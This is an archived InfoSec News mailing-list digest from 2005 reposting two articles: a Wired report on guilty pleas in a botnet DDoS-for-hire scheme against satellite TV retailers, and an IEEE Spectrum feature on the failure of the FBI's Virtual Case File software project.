From isn at c4i.org Sat Sep 10 00:07:28 2005
From: isn at c4i.org (InfoSec News)
Date: Sat Sep 10 00:36:22 2005
Subject: [ISN] Hackers Admit to Wave of Attacks
Message-ID:

http://www.wired.com/news/privacy/0,1848,68800,00.html

By Kevin Poulsen
Sept. 08, 2005

An Ohio computer hacker who served as a digital button man for a shady internet hosting company faces prison time after admitting he carried out one of a series of crippling denial-of-service attacks ordered by a wealthy businessman against his competitors.

In a deal with prosecutors, Richard "Krashed" Roby, 20, pleaded guilty in federal court in Toledo last month to intentionally damaging a protected computer, after launching a 2003 attack on an online satellite TV retailer that caused at least $120,000 in losses.

"There were a lot of big-time people making a lot of money who picked up on him and persuaded him to do this, without a lot in it for him," says Mark Weinberg, Roby's attorney. "He's one of these people who are brilliant in one area but absolutely lacking in common sense in others."

Jay Echouafni, the 38-year-old satellite TV mogul who allegedly ordered and funded the cyberhits, went on the lam last year, and remains a fugitive from a federal indictment out of Los Angeles.

In a related deal, 31-year-old Paul Ashley, former operator of the Foonet hosting service, admitted to recruiting three other computer intruders to carry out Echouafni's orders. He has not yet entered a guilty plea.

Under federal sentencing guidelines, Ashley faces 70 to 87 months in prison for his role in the attacks, but the terms of his plea agreement make him eligible for a reduced sentence in exchange for his testimony against other defendants.

"If Ashley were to cooperate with the government and, for example, testify against Echouafni, he could get a departure from his sentence," said Los Angeles assistant U.S. attorney James Aquilina, who's prosecuting the case.

Roby faces 18 months to two years in prison under sentencing guidelines.

Until it was shuttered by an FBI raid last year, Ashley ran Foonet from a basement server room in his suburban Ohio home.
The enterprise enjoyed a double-edged reputation for providing hosting that could stand up to distributed denial of service, or DDOS, attacks, even as it gave safe harbor to members of the computer underground drawn to the bulletproof service.

"Every script kiddy on IRC had a shell there," says Andrew Kirch, a security administrator for the Abusive Hosts Blocking List. "Spamming, hacking, phishing, DDOS networks -- you want to run scans for a large amount of IP space for prevalent Windows vulnerabilities? Set up there."

In his plea agreement, Ashley admitted he knowingly allowed clients and employees to control networks of compromised Windows machines, or "bots," from Foonet. That came in handy in October 2003, when Echouafni, a Foonet client, offered Ashley $1,000 to snuff out two websites.

Echouafni, who was CEO of Massachusetts-based Orbit Communication at the time, allegedly claimed that competitors RapidSatellite.com and WeaKnees.com had stolen his content and attacked his online business, which sold satellite TV gear over the web.

Ashley took the money and, according to his plea agreement, recruited three associates to do the dirty work: Jonathan Hall, Lee Walker and Joshua Schichtel, known online as "Rain," "sorCe" and "Emp" respectively.

Hall, who is not currently charged in the case, says the offer marked a change in Ashley's business practices.

"Prior to Jay asking for all that crap, Paul Ashley never really asked me to launch large-scale attacks like that," Hall said in a telephone interview.

Roby was pulled into the gang by Schichtel, who found his network of 3,000 bots inadequate to take down Miami-based RapidSatellite, according to court records. Roby's resources were more formidable: The young hacker controlled approximately 15,000 Windows machines that he'd taken over with a variant of the Spybot worm. Schichtel allegedly promised Roby a free Foonet shell account in exchange for turning those hacked PCs against RapidSatellite.
"Foolish," says attorney Weinberg.

The FBI described the ensuing attack as a tenacious, 10-day deluge that tracked RapidSatellite through three ISP changes, and briefly blocked Amazon.com and the website of the Department of Homeland Security, which had the poor luck of sharing service providers with Echouafni's rival. A concurrent attack allegedly launched by the other members of the crew took a similar toll on WeaKnees.com.

Apparently pleased with the results, Echouafni went on to purchase Foonet from Ashley, retaining Ashley as an employee and hiring Hall to handle cybersecurity for the company. In February of last year, Echouafni allegedly ordered a third attack on another competitor, ExpertSatellite.com.

Prosecutors filed the first round of charges against Ashley and his alleged co-conspirators last year, then dropped them during plea negotiations with some of the defendants. Schichtel could not be reached for comment for this story, and Ashley's attorney failed to return repeated phone calls.

Roby's lawyer says the young hacker had little to offer prosecutors in exchange for a sweeter deal. "When you're at the bottom of the barrel, there's not much you can tell them," says Weinberg. "Usually the people who are at the top have the ability to provide the most substantial assistance."

Aquilina says prosecution is proceeding against Walker in the United Kingdom, where Walker lives.

Hall is a resident of flooded New Orleans. Speaking with Wired News from the Houston hotel to which he evacuated with his family, he says he never participated in the attacks, even after Echouafni ordered one personally, as his boss.

"The first time he asked me to launch some stupid-ass attack, he claimed that the company had hacked his database and wiped it out," says Hall. "I knew it was bullshit."

When Echouafni threatened to fire Hall, the then-teenaged hacker promised to carry out the order, but never did, he claims.
"He kept catching on that the attacks weren't going through, and he kept climbing up my ass and saying that they're not working. But I never actually did it.... Jay was an asshole."

Hall says he stopped attacking computers when he was 16.

Echouafni skipped out on $750,000 bail secured by his house in Massachusetts last year. Law enforcement officials believe he's now living in his native Morocco.

From isn at c4i.org Sat Sep 10 00:27:35 2005
From: isn at c4i.org (InfoSec News)
Date: Sat Sep 10 00:37:14 2005
Subject: [ISN] Who Killed the Virtual Case File?
Message-ID:

http://www.spectrum.ieee.org/WEBONLY/publicfeature/sep05/0905fbi.html

By Harry Goldstein
08 Sept 2005

In the early 1990s, Russian mobsters partnered with Italian Mafia families in Newark, N.J., to skim millions of dollars in federal and New Jersey state gasoline and diesel taxes. Special Agent Larry Depew set up an undercover sting operation under the direction of Robert J. Chiaradio, a supervisor at the Federal Bureau of Investigation's Washington, D.C., headquarters. Depew collected reams of evidence from wiretaps, interviews, and financial transactions over the course of two and a half years. Unfortunately, the FBI couldn't provide him with a database program that would help organize the information, so Depew wrote one himself. He used it to trace relationships between telephone calls, meetings, surveillance, and interviews, but he could not import information from other investigations that might shed light on his own.

So it wasn't until Depew mentioned the name of a suspect to a colleague that he obtained a briefcase that his friend had been holding since 1989. "When I opened it up, it was a treasure trove of information about who's involved in the conspiracy, including the Gambino family, the Genovese family, and the Russian components. It listed percentages of who got what, when people were supposed to pay, the number of gallons.
It became a central piece of evidence," Depew recalled during an interview at the FBI's New Jersey Regional Computer Forensic Laboratory, in Hamilton, where he is the director. "Had I not just picked up the phone and called that agent, I never would have gotten it."

A decade later, Depew's need to share information combined with his do-it-yourself database skills and connection to his old supervisor, Chiaradio, would land him a job managing his first IT project - the FBI's Virtual Case File.

Depew's appointment to the FBI's VCF team was an auspicious start to what would become the most highly publicized software failure in history. The VCF was supposed to automate the FBI's paper-based work environment, allow agents and intelligence analysts to share vital investigative information, and replace the obsolete Automated Case Support (ACS) system. Instead, the FBI claims, the VCF's contractor, Science Applications International Corp. (SAIC), in San Diego, delivered 700 000 lines of code so bug-ridden and functionally off target that this past April, the bureau had to scrap the US $170 million project, including $105 million worth of unusable code. However, various government and independent reports show that the FBI - lacking IT management and technical expertise - shares the blame for the project's failure.

In a devastating 81-page audit, released in 2005, Glenn A. Fine, the U.S. Department of Justice's inspector general, described eight factors that contributed to the VCF's failure. Among them: poorly defined and slowly evolving design requirements; overly ambitious schedules; and the lack of a plan to guide hardware purchases, network deployments, and software development for the bureau.
Fine concluded that four years after terrorists crashed jetliners into the World Trade Center and the Pentagon, the FBI, which had been criticized for not "connecting the dots" in time to prevent the attacks, still did not have the software necessary to connect any new dots that might come along. And won't for years to come.

"The archaic Automated Case Support system - which some agents have avoided using - is cumbersome, inefficient, and limited in its capabilities, and does not manage, link, research, analyze, and share information as effectively or timely as needed," Fine wrote. "[T]he continued delays in developing the VCF affect the FBI's ability to carry out its critical missions."

This past May, a month after it officially ended the VCF project, the FBI announced that it would buy off-the-shelf software at an undisclosed cost to be deployed in phases over the next four years. Until those systems are up and running, however, the FBI will rely on essentially the same combination of paper records and antiquated software that the failed VCF project was supposed to replace. The only recent addition has been a new "investigative data warehouse" that combines several of the FBI's crime and evidence databases into one. It was completed as the VCF started its final slide into oblivion. In addition, the FBI recently digitized millions of its paper documents and made them available to agents.

As the FBI gears up to spend hundreds of millions more on software over the next several years, questions persist as to how exactly the VCF went so terribly wrong and whether a debacle of even bigger proportions looms on the horizon. Despite high-profile Congressional hearings, hundreds of pages of reports churned out by oversight bodies, and countless anguished articles in the trade press and mainstream media, the inner workings of the project and the major players have remained largely invisible.
Now, detailed interviews with people directly involved with the VCF paint a picture of an enterprise IT project that fell into the most basic traps of software development, from poor planning to bad communication. Lost amid the recriminations was an early warning from one member of the development team that questioned the FBI's technical expertise, SAIC's management practices, and the competence of both organizations.

Matthew Patton, a security expert working for SAIC, aired his objections to his supervisor in the fall of 2002. He then posted his concerns to a Web discussion board just before SAIC and the FBI agreed on a deeply flawed 800-page set of system requirements that doomed the project before a line of code was written. His reward: a visit from two FBI agents concerned that he had disclosed national security secrets on the Internet.

To understand why the VCF was so important, you've got to understand the FBI. And to understand the FBI, you've got to understand its organization and its agents.

The bureau, headquartered in the J. Edgar Hoover Building in Washington, D. C., currently has 23 divisions, including counterintelligence, criminal investigation, and cybercrime. The divisions fall under the control of five executive assistant directors responsible for intelligence, counterterrorism and counterintelligence, criminal investigations, law enforcement services (such as labs and training), and administration. Until last year, each division had its own IT budget and systems. And because divisions had the freedom and money to develop their own software, the FBI now has 40 to 50 different investigative databases and applications, many duplicating the functions and information found in others. Last year, in an effort to centralize IT operations and eliminate needless redundancies, the FBI's chief information officer, who reports to the director, took charge of all its IT budgets and systems.
The bureau's 12 400 agents work out of 56 field offices and 400 satellite - or resident agency - offices, as well as 51 Legal Attaché offices scattered across the globe in U.S. embassies and consulates. A field agent works as part of a squad; each squad has a supervisor, who reports to the assistant special agent in charge, who in turn reports to the special agent in charge of the field office.

Agents investigate everything from counterterrorism leads to bankruptcy fraud, online child pornography rings to corrupt public officials, art thefts to kidnappings. They interview witnesses, develop informants, conduct surveillance, hunt for clues, and collaborate with local law enforcement to find and arrest criminals. Agents document every step and methodically build case files. They spend a tremendous amount of time processing paperwork, faxing and FedEx-ing standardized memo and requisition forms through the approval chain - up to the squad supervisor and eventually to the special agent in charge.

This system of forms and approvals stretches back to the 1920s, when J. Edgar Hoover, director from 1924 to 1972, standardized all of the bureau's investigative reports on forms, so an agent could walk into any FBI office and find the same system. Today, the bureau has hundreds of standard forms. To record contact with an informant, fill out Form FD-209. When getting married or divorced, complete Form FD-292. To report information gleaned from an interview that may later become testimony, use Form FD-302. To conduct a wiretap, file Form FD-472. To wire an informant with a body recorder and transmitter, submit Form FD-473. After traveling overseas for business or pleasure, report the experience on Form FD-772. Plan an arrest with Form FD-888. Open a drug investigation with Form FD-920.

Forms related to investigations, such as those used to report interviews with witnesses, wend their way up and down the approval chain.
Once the appropriate supervisors sign off on the form, it goes back to the agent, who gives it to a clerk to enter into the ACS system. From there, the paper form is filed as part of the official record of the case. Sometimes, though the FBI officially denies this, an agent doesn't enter all case notes into ACS. Some agents think, "If I don't trust ACS because I don't think it will protect my informant or my asset, I'm not putting the data in there," said Depew, an avid user of ACS who touted the electronic system to his fellow agents as safer than a paper filing system. FBI spokesperson Megan Baroska emphasized in an e-mail that Depew did not speak for the bureau in this instance. "The FBI policy is for all official records to be entered into ACS. Additionally, 'notes' per say [sic] are not entered into ACS; they are first memorialized in a 302 form, and that form is entered into ACS. As for the 'notes,' they are kept in storage as a paper file because they legally have to be discoverable." When asked during an interview at FBI headquarters if agents felt uncomfortable about exchanging a paper-based system for an electronic one, the FBI's current CIO, Zalmai Azmi, didn't think agents would find it hard to get into the habit of processing forms electronically. But introducing an electronic record-keeping system does raise legal policy questions in their minds. "What is a record and what is available under discovery? In a paper world, you do your job, you do your notes, and if you don't like it, it goes somewhere," Azmi said. "In an electronic world, nothing really is destroyed; it's always somewhere." DESPITE AGENTS' RELUCTANCE to embrace the digital age, in 2000 the bureau finally began to deal with its outdated IT systems. At the time, under the direction of Louis J. Freeh, the bureau had neither a CIO nor documentation detailing its IT systems, much less a plan for revamping them. The task of creating such a plan fell to former IBM executive Bob E. 
Dies, who became assistant director in charge of the FBI Information Resources Division on 17 July 2000. He was the first of five officials who, over the next four years, would struggle to lead the FBI's sprawling and antiquated information systems and get the VCF project under way. According to a 2002 report from the DOJ's Office of the Inspector General, when Dies arrived, 13,000 computers could not run modern software. Most of the 400 resident agency offices were connected to the FBI intranet with links about the speed of a 56-kilobit-per-second modem. Many of the bureau's network components were no longer manufactured or supported. And agents couldn't e-mail U.S. Attorney offices, federal agencies, local law enforcement, or each other; instead, they typically faxed case-related information. In September 2000, Congress approved $379.8 million over three years for what was then called the FBI Information Technology Upgrade Project. Eventually divided into three parts, the program became known as Trilogy. The Information Presentation Component would provide all 56 FBI field offices, some 22,000 agents and support staff, with new Dell Pentium PCs running Microsoft Office, as well as new scanners, printers, and servers. The Transportation Network Component would provide secure local area and wide area networks, allowing agents to share information with their supervisors and each other. But the User Applications Component, which would ultimately become the VCF, staked out the most ambitious goals. First, it was to make the five most heavily used investigative applications - the Automated Case Support system, IntelPlus, the Criminal Law Enforcement Application, the Integrated Intelligence Information Application, and the Telephone Application - accessible via a point-and-click Web interface. Next, it would rebuild the FBI's intranet. Finally, it was supposed to identify a way to replace the FBI's 40-odd investigative software applications, including ACS. 
Based on the 1970s-era database Adabas and written in a programming language called Natural, both from Software AG, Darmstadt, Germany, the Automated Case Support system, which debuted in 1995, was antiquated even as it was deployed - and it is still being used today. Originally, agents and clerks accessed the program via vintage IBM 3270 green-screen terminals connected to a mainframe over dedicated lines. Eventually, the 3270 terminals were emulated on standard desktop PCs. By navigating complicated menus using function keys and keystroke commands, agents could do basic Boolean and keyword searches for things like an informant's name or the dates of a wiretap surveillance, information related to cases they were working. But according to Depew, only the most dedicated, computer-savvy agents had the skills and patience to learn the arcane system, let alone exploit it to its full potential. "Nobody really understood why we would even use ACS other than as an index," said Depew. A notable exception: Robert Hanssen, the notorious FBI traitor, used the system to find documents his Russian handlers might find useful, as well as to check to see if anyone at the FBI was onto him [see "Mission Impossible," IEEE Spectrum, April 2003]. In May and June 2001, the bureau awarded Trilogy contracts to two major U.S. government contractors: DynCorp, of Reston, Va., for the hardware and network projects, and SAIC for software. All three Trilogy components were to be delivered by the middle of 2004. Instead of paying a fixed price for the hardware, networks, and software, the FBI used cost-plus-award fee contracts. These would pay the cost of all labor and materials plus additional money if the contractor managed costs commendably. Crucially, if the scope of the project expanded or if the contractor incurred other unforeseen costs, the FBI would have to pick up those, too. ON 4 SEPTEMBER 2001, Robert S. Mueller III became the tenth director in FBI history. 
One week later, terrorists pulverized New York City's World Trade Center and a piece of the Pentagon. The inability of FBI agents to share the most basic information about Al Qaeda's U.S. activities blew up into a front-page scandal. Within days, the FBI's pathetic technology infrastructure went from being so much arcane trivia to a subject of daily fulmination by politicians and newspaper columnists. As The 9/11 Commission Report would conclude in 2004, "the FBI's information systems were woefully inadequate. The FBI lacked the ability to know what it knew; there was no effective mechanism for capturing or sharing its institutional knowledge." In the face of intense public and congressional pressure, Mueller shifted Trilogy into high gear. In October, he pulled Chiaradio up from his position as special agent in charge of the field office in Tampa, Fla., to Hoover Building headquarters in Washington, to advise him on the all-important software component of Trilogy. An accountant by training, Chiaradio would become the FBI's executive assistant director for administration in December 2001. After discussions with Mueller, Chiaradio determined that the FBI's basic plan for the software portion of Trilogy - slapping a Web interface onto the ACS system and the four other programs - wasn't going to make agents more effective. So to help him figure out what would work, he brought in Depew. [See timeline, "Countdown to Catastrophe."] Partial to dark suits and wraparound shades, Depew kept his gray hair closely cropped and a pistol holstered on his belt. He was a G-man's G-man. And he embraced technology with an almost evangelical zeal. When he was working the New Jersey fuel oil case in the early 1990s, Depew not only coded his own case management database using the FoxPro program, but he put it on floppy disks and gave it to any agent who asked for a copy. Depew joined a team of seven that assessed the Web interface SAIC was designing for the ACS system. 
When completed, the interface would let agents point and click their way through the tedious process of filling out official forms, but not much else. Recognizing the limitations of the interface and ACS, Chiaradio and Depew met with Dies. They convinced him, and later the director himself, that the bureau needed an entirely new database, graphical user interface, and applications, which would let agents search across various investigations to find relationships to their own cases. The new case management system would host millions of records containing information on everything from witnesses, suspects, and informants to evidence such as documents, photos, and audio recordings. To address concerns being raised by intelligence experts and lawmakers in the wake of 9/11, these records would be accessible to both the FBI's agents and its intelligence analysts. Chiaradio dubbed the new system the Virtual Case File. Dies wanted to provide agents with this software as fast as possible. In Depew's view that meant "shooting from the hip." This cavalier approach to software development would prove fatal to the VCF. Today, many organizations rely on a blueprint - known in IT parlance as an enterprise architecture - to guide hardware and software investment decisions. This blueprint describes at a high level an organization's mission and operations, how it organizes and uses technology to accomplish its tasks, and how the IT system is structured and designed to achieve those objectives. Besides describing how an organization operates currently, the enterprise architecture also states how it wants to operate in the future, and includes a road map - a transition plan - for getting there. The problem was, the FBI didn't have such a blueprint, as numerous reports from the Government Accountability Office, the DOJ's inspector general, and the National Research Council subsequently pointed out. 
Without it, the bureau could not, as a 2004 report from the NRC stated, "make coherent or consistent operational or technical decisions" about linking databases, creating policies and methods for sharing data, and making tradeoffs between information access and security. With no detailed description of the FBI's processes and IT infrastructure as a guideline, Depew said that his team of agents began "to feel our way in the dark," to characterize investigative processes such as witness interviews and surveillance operations and map them to the FBI's software and databases. Over a six-week period in the fall of 2001, Depew's group defined how agents worked, how they gathered information, and how that information was fed into ACS. Working with engineers from SAIC, they drew up diagrams and flowcharts of how the case management system operated then and how they wanted the new case management system, the VCF, to operate in the future. Mueller himself attended one of these meetings to tell the agents to design a system that would work best for them and not to feel constrained by 50-year-old business rules. Depew's team also called in people from across the FBI: a dozen in the first few weeks; 40 by the end of November. These "subject matter experts" explained how their divisions or units functioned internally and with the rest of the bureau. In December 2001, the FBI asked SAIC to stop building a Web front end for the old programs. (Later, FBI computer specialists would create a Web interface of their own as a stopgap until the VCF was delivered; agents still use it today.) Instead, SAIC was asked to devise a new application, database, and graphical user interface to completely replace ACS. To formally define what users needed the VCF to do for them, SAIC embarked on a series of Joint Application Development (JAD) sessions. In these meetings, Depew's team of agents and experts got together with a group of SAIC engineers to hash out what functions the VCF would perform. 
Ideas captured in these sessions formed the basis of the requirements document that guided SAIC's application designers and programmers. In January 2002, the FBI requested an additional $70 million to accelerate Trilogy; Congress went further, approving $78 million. DynCorp committed to delivering its two components by July 2002. SAIC agreed to deliver the initial version of the VCF in December 2003 instead of June 2004. SAIC and the FBI were now committed to creating an entirely new case management system in 22 months, which would replace ACS in one fell swoop, using a risky maneuver known in the IT business as a flash cutover. Basically, people would log off from ACS on Friday afternoon and log on to the new system on Monday morning. Once the cutover happened, there was no going back, even if it turned out that the VCF didn't work. And there was no plan B. But while the Trilogy contracts were changed to reflect the aggressive new deadlines, neither the original software contract nor the modified one specified any formal criteria for the FBI to use to accept or reject the finished VCF software, as the Inspector General reported earlier this year. Furthermore, those contracts specified no formal project schedules at all, let alone milestones that SAIC and DynCorp were contractually obligated to meet on the way to final delivery. In reaction to the new deadline, SAIC broke its VCF development group into eight teams, working in parallel on different functional pieces of the program, in order to finish the job faster. But the eight threads would later prove too difficult for SAIC to combine into a single system. Nevertheless, in an interview at SAIC's McLean, Va., office complex, Rick Reynolds, vice president and operations manager for SAIC, defended the decision to change tactics. "People forget the urgency that we were under and our customer was under. And we were right beside them," he declared. "We were in the foxhole together." 
AT HOOVER BUILDING HEADQUARTERS, Depew's team was hard at work describing the FBI's investigative and administrative processes: how agents built case files, how case files were used, and what additional functions they wanted the Virtual Case File to perform. While Depew and his team prepared to communicate the processes that define the FBI to SAIC engineers, Mueller, Dies, and Chiaradio recruited a seasoned IT program manager. Before coming to the FBI, C.Z. ("Sherry") Higgins, a 29-year veteran of AT&T and Lucent, was running the help desk at the Technology Command and Control Center for the 2002 Winter Olympics in Salt Lake City. As project management executive for the Office of the Director, Higgins was brought in to create the Office of Program Management. Higgins's new office would centralize IT management and oversee, develop, and deploy the bureau's most expensive, complex, and risky projects. But her most important assignment was to manage Trilogy. Higgins, who left the FBI in June 2004, lives in a Cape Cod-style house overlooking a pond deep in the exurbs of Atlanta, in her native Georgia. During an interview in her living room, three fat scrapbooks of her two and a half years at the FBI peeked out from beneath a coffee table covered with candles. Her first move when she came on board in March 2002, she explained, was to appoint Depew, who had no IT project management experience, the VCF project manager. "I'm totally accountable for that," she acknowledged. "We talked a long time about could he play the role of project manager and still be customer advocate. And we felt like he could." Higgins and Depew had developed a rapport quickly. Just a couple of weeks after she started work at FBI headquarters, Depew invited her to the Thursday "board meeting" - pizza and beer with his team at a neighborhood joint. 
As the group started walking to the restaurant, Higgins, surrounded by agents in dark suits and sunglasses, asked them to stop so she could savor the moment. "I have arrived," she announced. "I'm on Pennsylvania Avenue with men in black!" The men in black had been specifying the VCF's requirements with SAIC engineers for several weeks when Higgins shifted Depew into the driver's seat. By this point, Depew, the former Trenton, N.J.-based bureau man, had rented an apartment in Washington, where he would live, separated from his family, for the next three years. He was responsible for a team of seven agents, each of whom acted as an advocate for a group of subject matter experts in the periodic JAD meetings with SAIC engineers that the team was attending. Over a six-month period, the JAD team met in two-week sessions, laying the unstable foundation for the VCF. Every day of each session, engineers from SAIC would sit with the agents and experts to chart existing and future processes on whiteboards. According to Higgins, sometimes agents would propose Web-page designs for particular portions of the user interface. So that the crowded meetings would stay orderly, people were assigned speaker and observer cards. Depew acted as a facilitator, running the meetings and telling people whether something they wanted was or was not within the scope of the project. "There were times when SAIC and I disagreed on what's in the scope," Depew recalled. Sometimes they would agree to "push that off to other people to decide whether that's in the scope of the current contract." After a two-week JAD session finished, a two-week feedback cycle would begin. SAIC provided Depew's team with information gleaned from the session, including needs statements, flow charts, and meeting minutes. Depew's team reviewed these materials and gave SAIC feedback while simultaneously preparing subject matter experts for the next round of JAD sessions, which immediately followed the feedback cycle. 
There were no breaks. "I worked seven days a week, 14 hours a day," Depew recalled. "Six months of JAD was hell." MEANWHILE, HIGGINS was finding it rough going herself. She asked her colleagues at the FBI and managers at DynCorp, which was working on the hardware (computers and network) portions of Trilogy, for copies of the two project schedules. She was told the delivery dates instead. In contrast, SAIC, with its programmers pecking away at its secure data center in Vienna, Va., always had a detailed schedule posted prominently in the "war room" there, which Higgins's team would review with SAIC periodically, she said. In mid-April 2002, Higgins gave DynCorp a week to deliver a detailed schedule. After she got it, she pulled the project teams from the FBI and DynCorp into a meeting and went through the document. Shortly after that, Higgins broke the news to the director: the computers and networks would not be delivered in July of that year as had been scheduled. She told Mueller that DynCorp didn't stand a chance of hitting the delivery target, because it didn't have a detailed schedule that mapped out how it would deploy, integrate, and test the new computers and networks. Mueller blamed himself for the delay, because he'd asked for an accelerated schedule. But Higgins blamed Mueller's staff for not being straight with him about his agency's ability to deliver what he wanted. "Did somebody come to you and say, okay, Mr. Director, sir, you can have it sooner, but it's going to cost you this much more money or you're going to have to do without something?" Higgins remembered asking Mueller. "And he said, 'No, nobody ever told me that.' And I said, 'Well, lesson No. 1: faster, cheaper, better. Pick two, but you can't have all three.'" With costs escalating and schedules slipping, Mueller had just one choice left: better. And he didn't even get that with the VCF. 
But in the summer of 2002, it certainly seemed as if the Virtual Case File would be a vast improvement over the Automated Case Support system. The JAD sessions had produced an exhaustively detailed requirements document. This plan for a case-management system would combine the ACS with two other systems: the Telephone Application, the bureau's central repository of telephone records related to investigations, and parts of the Criminal Law Enforcement Application, a repository for investigative data about people, organizations, locations, vehicles, and communications. The VCF system would accept scanned documents, photographs, and other electronic media - to simplify evidence tracking. People with the proper credentials would be able to access that evidence from any FBI office. The way work flowed through the bureau would change dramatically, too. Instead of filling out a form either by hand or in a word-processing program and then faxing or FedEx-ing the paper form to a supervisor, an agent would fill out a form online and, with a click of the mouse, route it to the supervisor. The document would pop up in a supervisor's in-box, and the agent could track it to see if it had been approved. And perhaps most important, information collected within a case file would eventually be available to software applications that would compare data among cases to search for correlations - to connect the proverbial dots. In a Senate hearing in July 2002, Higgins impressed lawmakers, including Senator Charles E. Schumer (D-N.Y.) - "That Southern charm gets me every time," an apparently smitten Schumer gushed - with a PowerPoint presentation about the VCF. Higgins contrasted the 12 different screens agents had to navigate to upload one form into ACS with the single screen they would use to perform a similar task in the new system. Higgins told the senators that the initial version of a user-friendly, secure system would be delivered by December 2003. 
The senators seemed satisfied that the VCF would address their gravest concerns about the FBI's IT systems by giving agents and intelligence analysts the ability to correlate and share the data needed to prevent future terrorist attacks. Higgins had reassured the senators, and scored some choice memorabilia: a Senate coaster and her nameplate for her scrapbook. IN THE SUMMER OF 2002, turmoil roiled the FBI's IT management. In May, Bob Dies, the CIO who had launched Trilogy, left the bureau, turning over his duties to Mark Tanner, who held the position of acting CIO for just three months, until July 2002. He stepped aside for Darwin John, former CIO for the Mormon Church. Chiaradio, who declined to be interviewed for this article, left for a lucrative job in the private sector with BearingPoint Inc., a global consultancy in McLean, Va., and was replaced by W. Wilson Lowery Jr. Within a year, Lowery would replace John. At the same time, SAIC was staffing up. By August 2002, it had around 200 programmers on the job. It was still looking for help, particularly for its security team, which was reviewing design documents that described the VCF software's overall structure, algorithms, and user interface, along with the ways data would be defined and handled. Matthew Patton answered an ad on SAIC's Web site for security engineers. A 1995 Carnegie Mellon University graduate with a B.S. in information and decision systems, Patton had financed college through service as a cadet in the U.S. Air Force Reserve Officers' Training Corps. After college, he spent his four-year tour of military duty at the Pentagon in the Office of the Secretary of Defense. There he designed and helped program the database and security components for a Web-based application used to plan the Department of Defense's $400 billion budget. Patton's still-valid top-secret DOD clearance qualified him to start work as part of the VCF security team. 
His clearance was provisional - the FBI would have to conduct its own background investigation (as it does for all contract employees) and grant him FBI top-secret clearance. So he was not allowed to see the data the FBI was sending to SAIC, which included information on all of the cases the bureau had digitized to that point, from the 1995 Oklahoma City bombing to 9/11. Instead, he spent a lot of time going through the requirements in his cubicle, segregated from his five colleagues and his boss. He left SAIC in November 2002, after only three months on the job. Patton regards himself as a straight shooter. "I'm not much of a culture guy," he admits. "I say my piece, and if they don't like it, that's too damn bad." But he quickly realized that SAIC didn't hire him for his opinions. When he began expressing concerns that security was not a top priority on the project, even in the post-Hanssen era, he was told not to rock the boat. "My refrain to my boss was, 'Why aren't we more involved? We should be in the thick of things.' But it was more that we weren't really invited and [SAIC teams working on the VCF] aren't actively seeking our involvement," Patton said in an interview in Chicago earlier this year. "So his take on it was basically, once the designers come up with something, we say good, bad, or indifferent, and if it's not too bad, then we let it go." Patton recounted his experience purely from memory. Unlike Higgins, who meticulously inserted internal FBI e-mails about Trilogy into her scrapbooks alongside photos of her kids visiting her in D.C., Patton said that he discarded the notebook he kept while he was at SAIC. The only existing artifact of his experience is a copy of the 26 October 2002 Internet posting that essentially got him kicked off the VCF project. 
The posting, archived at http://archives.neohapsis.com/archives/isn/2002-q4/0090.html, expresses specific security-related concerns and depicts SAIC as giving a clueless FBI exactly what it was asking for, no matter how impractical. Patton's descriptions of the 800-plus pages of requirements show the project careening off the rails right from the beginning. For starters, this bloated document violated the first rule of software planning: keep it simple. According to experts, a requirements document should describe at a high level what functions the program should perform. The developers then decide how those functions should be implemented. Requirements documents tend to consist of direct, general phrases: "The user shall be able to search the database by keyword," for instance. "In a requirements document, you want to dictate the whats, not the hows," Patton said. "We need an e-mail system that can do x, and there's 12 bullets. Instead, we had things like 'there will be a page with a button that says e-mail on it.' We want our button here on the page or we want it that color. We want a logo on the front page that looks like x. We want certain things on the left-hand side of the page." He shook his head. "They were trying to design the system layout and then the whole application logic before they had actually even figured out what they wanted the system to do." Recalling the Web pages the agents would bring into the JAD sessions to demonstrate how they wanted the VCF to look, Higgins blamed both SAIC and the agents for creating the overstuffed requirements document. "The customer should be saying, 'This is what we need.' And the contractor should be saying, 'Here's how we're going to deliver it.' And those lines were never clear," Higgins said. "The culture within the FBI was, 'We're going to tell you how to do it.'" Zalmai Azmi, the FBI's current CIO, has been in that job since December 2003. 
Originally brought on as a consultant to Mueller that November, Azmi had worked with the director when Mueller was U.S. Attorney in San Francisco and Azmi was CIO of the Executive Office for United States Attorneys. Azmi saw the Virtual Case File through its final death throes. In an hour-long interview in his office at the Hoover Building, Azmi also traced the VCF's demise to flawed requirements and emphasized that his office is taking pains to make sure it doesn't happen again. Azmi insisted that SAIC should have clarified user needs in the JAD sessions rather than working with requirements that were not "clear, precise, and complete." On the other hand, the FBI's lax project management didn't stop the requirements from snowballing. "There was no discipline to say enough is enough," Azmi said. The overly specific nature of the requirements focused developers on their tiny piece of the puzzle. They were writing code, Patton said, with no idea of how their piece fit with the others. This presaged the integration problems that would later plague the project. "The whole working procedure [SAIC project managers] had was very much, 'We'll give you your marching orders and you go,' without too much consideration of how in the world do you glue this sucker back together when all these different divergent pieces come back," Patton said. Patton also claimed that SAIC was determined to write much of the VCF from scratch. This included an e-mail-like system that at least one team, to his knowledge, was writing, even though the FBI was already using an off-the-shelf software package, Novell's GroupWise, for e-mail. "Every time you write a line of code, you introduce bugs," noted Patton. "And they had a bunch of people slinging code. I'm not saying that the guys were technically incompetent. But bugs happen, and not all programmers are great." 
After several weeks of asking his boss questions and being repeatedly told that he needed to calm down and be "a team player," Patton posted a message to InfoSec News, an e-mail forum that distributes information security news articles and comments from its subscribers. Without naming the VCF specifically, he mentioned that he was working on Trilogy's case management system and complained that no one was taking security issues seriously. He pointed to some security measures the FBI already had in place that might make the case management system more secure. These included PKI, or public-key infrastructure, a system of digital certificates and independent authorities that verify and authenticate the validity of each party involved in an Internet transaction. He also mentioned Bedford, Mass.-based RSA Security Inc.'s SecurID, which uses a combination of passwords and physical authenticators that function like ATM cards to protect various kinds of electronic transactions. He asked for help in getting in touch "with some heavy-hitting clued-in people over at the FBI," who would "demand some real accountability from the contractors involved." "They [the FBI] don't know enough to even comment on a bad idea, let alone tear it apart," he went on. "As a two-bit journeyman I can't seem to get anyone to pay the slightest attention, nor do they apparently (want to) understand just how flawed the whole design is from the get-go." He ended by asking, "Shouldn't somebody care?" Somebody did. Sherry Higgins saw the message and promptly reported Patton to the FBI's Security Division. "He had posted information that was not true and was sensitive," she told me in an e-mail. "He was pretty much a disgruntled employee. Instead of bringing his concerns up the ladder, he chose to post them on the Internet. He blasted the team both at SAIC and the FBI." "Be careful of him," she warned. "In hindsite [sic], I guess it looks like he is saying now, 'I told you so.' 
